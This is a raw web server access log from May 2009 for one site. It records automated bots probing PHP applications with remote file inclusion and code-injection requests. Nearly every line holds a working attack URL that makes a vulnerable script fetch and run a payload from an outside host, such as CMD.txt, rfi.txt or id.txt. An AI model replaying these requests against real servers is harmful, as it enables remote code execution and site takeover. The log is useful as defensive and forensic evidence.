62.141.54.240 - - [19/May/2009:09:00:14 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:09:00:39 -0700] "GET /logs/access_080212.log/myevent.php?myevent_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:00:39 -0700] "GET /logs/access_080208.log/index.php?body=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:00:50 -0700] "GET /logs/index.php?body=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.97.239.175 - - [19/May/2009:09:01:05 -0700] "GET /logs/access_090206.log%20%20//7technote//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.239.175 - - [19/May/2009:09:01:12 -0700] "GET /logs/access_090206.log%20%20//7technote//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.239.175 - - [19/May/2009:09:01:12 -0700] "GET /logs/access_090318.log%20%20//7technote//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.239.175 - - [19/May/2009:09:01:19 -0700] "GET /logs/access_090318.log%20%20//7technote//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.239.175 - - [19/May/2009:09:01:22 -0700] "GET /logs/access_090206.log%20%20//7technote//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.239.175 - - [19/May/2009:09:01:22 -0700] "GET /logs/access_090318.log%20%20//7technote//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:01:26 -0700] "GET /logs/access_090213.log%20%20//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:01:28 -0700] "GET /logs/access_090104.log%20%20//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.27.28.240 - - [19/May/2009:09:01:54 -0700] "GET /logs/access_080617.log HTTP/1.1" 200 1703936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:02:09 -0700] "GET /logs/access_090321.log//index2.php?page=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:02:23 -0700] "GET /logs/access_080415.log//index2.php?page=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:02:30 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:02:30 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:02:30 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.180.234.156 - - [19/May/2009:09:02:47 -0700] "GET /logs/access_081114.log HTTP/1.1" 200 3300699 "-" "curl/7.18.2 (i386-pc-win32) libcurl/7.18.2 zlib/1.2.3" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:02:55 -0700] "GET /errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:02:55 -0700] "GET /logs/access_080804.log/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:02:55 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:02:55 -0700] "GET /logs/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:02:56 -0700] "GET /logs/access_080512.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:02:56 -0700] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:02:56 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:02:57 -0700] "GET /logs/access_080905.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:02:57 -0700] "GET /logs/access_080604.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:02:57 -0700] "GET /logs/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:02:57 -0700] "GET /logs/access_080604.log%20%20/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:02:57 -0700] "GET /logs/access_080905.log%20%20/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:04 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:03:06 -0700] "GET /logs/access_080823.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:20 -0700] "GET /logs/access_080823.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:03:21 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:22 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:22 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:03:22 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:03:23 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:03:29 -0700] "GET /logs/access_080512.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:03:29 -0700] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:03:29 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:30 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 200 7988 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:37 -0700] "GET /logs/access_080823.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:03:40 -0700] "GET /logs/access_080823.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:03:42 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 200 7988 "-" "libwww-perl/5.79" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:03:43 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.64.202.134 - - [19/May/2009:09:03:59 -0700] "GET /logs/access_080529.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:04:07 -0700] "GET /components/com_flyspray/startdown.php?file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:04:11 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:04:11 -0700] "GET /logs/access_080719.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:04:12 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:04:15 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:09:04:19 -0700] "GET /logs/access_081123.log%20%20///vwar/backup/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:09:04:28 -0700] "GET /logs/access_081114.log%20%20///vwar/backup/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:09:04:34 -0700] "GET /logs/access_080701.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:09:04:35 -0700] "GET /logs/access_080701.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:04:38 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:09:04:47 -0700] "GET /logs/access_080808.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:04:56 -0700] "GET /logs/access_080604.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:04:56 -0700] "GET /index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:04:57 -0700] "GET /logs/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:04:57 -0700] "GET /logs/access_080719.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:09:05:04 -0700] "GET /logs/access_080808.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:05:28 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:05:43 -0700] "GET /songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:05:43 -0700] "GET /logs/access_090129.log%20%20//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:05:43 -0700] "GET /logs//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:05:48 -0700] "GET /logs/access_090223.log%20%20//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:05:54 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:05:55 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:05:55 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:05:55 -0700] "GET /logs/access_080512.log%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:05:59 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:06:00 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:06:00 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:06:03 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:06:04 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:06:04 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:06:17 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.184.2.107 - - [19/May/2009:09:06:20 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:06:21 -0700] "GET /logs/access_090214.log%20%20//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:06:21 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:06:21 -0700] "GET /logs//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:06:25 -0700] "GET /logs/access_080703.log/index.php?body=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:06:25 -0700] "GET /logs/access_080512.log%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:06:28 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:06:40 -0700] "GET /logs/access_080905.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:06:40 -0700] "GET /logs/access_080604.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:06:47 -0700] "GET /logs/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:06:50 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:06:50 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:06:50 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:06:52 -0700] "GET /logs/access_080512.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:06:55 -0700] "GET /logs/access_090209.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:07:10 -0700] "GET /logs/access_080512.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:07:13 -0700] "GET /logs/access_081117.log%20%20//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:07:14 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:07:14 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:07:14 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:09:07:15 -0700] "GET /logs/access_090209.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
